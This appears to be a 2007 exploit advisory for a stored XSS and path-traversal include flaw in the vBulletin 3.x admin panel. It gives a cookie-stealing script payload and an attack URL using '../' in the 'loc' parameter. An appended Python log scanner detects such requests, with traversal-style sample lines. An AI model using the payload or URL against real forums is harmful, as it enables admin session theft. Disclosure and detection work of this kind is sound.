vbulinclude-xss.txt
Posted on 22 June 2007
+--------------------------------------------------------------------
+
+ New Include Redirect Bug XSS All vBulletin® v 3.x.x
+
+--------------------------------------------------------------------
+ Vendor site .......: http://www.vbulletin.com/
+ Affected software .: vbulletin
+ Class .............: XSS
+ Risk ..............: Low
+ Found by ..........: rUnViRuS
+ Original advisory .: http://www.sec-area.com/
+ Contact ...........: stormhacker[at]hotmail[.]com
+
+--------------------------------------------------------------------

New Include Redirect Bug XSS All vBulletin v 3.x.x

This injection allows an attacker to make the admin control panel
include (redirect the admin to) a page of the attacker's choice,
effectively performing XSS on the page and stealing the cookie.

The XSS is permanent (a file containing the XSS code must first be
uploaded to the site).

PoC : <script>alert(document.cookie)</script>
      (to be used with a cookie stealer)

The following is a simple attack:

http://localhost/vb/admincp/index.php?loc=../../../nez.txt

When the URL is opened, the cookies are stolen.

+--------------------------------------------------------------------
+ [W]orld [D]efacers [T]eam
+ Greets:
+ || rUnViRuS || - || Provide || - || HeX || - || dEv!L RoOT ||
+ || BlackWHITE || - || dOcnok || - || A.tar0uDant.D ||
+ || Pro Hacker || - || DARKFIRE || - || papipsycho ||
+ Sp.Thanx To : Sec-Area.com Member's
+-------------------------[ W D T ]----------------------------------
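
Added example (not part of the original advisory, and not vBulletin code): a log check a forum operator could run to find requests to admincp/index.php whose loc value points outside the control panel, as in the URL above. The access-log format, the sample lines and the rule that legitimate loc values name .php scripts are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote

# Request line of a common/combined-format access log entry (assumed format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def loc_is_suspicious(loc):
    """Return a reason string for a risky loc value, or None if it looks benign."""
    val = loc
    for _ in range(3):                      # undo nested percent-encoding
        decoded = unquote(val)
        if decoded == val:
            break
        val = decoded
    val = val.replace("\\", "/")
    if ".." in val.split("/"):
        return "path traversal"
    if val.startswith("//") or re.match(r"[a-z][a-z0-9+.-]*:", val, re.I):
        return "external target"
    # Assumption: legitimate values name .php scripts of the control panel.
    if not val.split("?", 1)[0].lower().endswith(".php"):
        return "non-PHP target"
    return None

def scan(lines):
    """Return (line_number, reason, loc) for each flagged admincp request."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        path, _, query = match.group(1).partition("?")
        if not path.lower().endswith("/admincp/index.php"):
            continue
        for loc in parse_qs(query).get("loc", []):   # parse_qs decodes once
            reason = loc_is_suspicious(loc)
            if reason:
                hits.append((number, reason, loc))
    return hits

# Constructed sample log lines; the first request path is the advisory's URL.
SAMPLE = [
    '192.0.2.10 - - [22/Jun/2007:10:00:01 +0000] "GET /vb/admincp/index.php?loc=../../../nez.txt HTTP/1.1" 200 512',
    '192.0.2.11 - - [22/Jun/2007:10:00:05 +0000] "GET /vb/admincp/index.php?loc=options.php HTTP/1.1" 200 900',
    '192.0.2.12 - - [22/Jun/2007:10:00:09 +0000] "GET /vb/admincp/index.php?loc=..%252f..%252fnez.txt HTTP/1.1" 200 512',
    '192.0.2.13 - - [22/Jun/2007:10:00:12 +0000] "GET /vb/index.php HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit on a request that also carries an administrator session is the case to investigate first, together with any recently uploaded file the loc value resolves to.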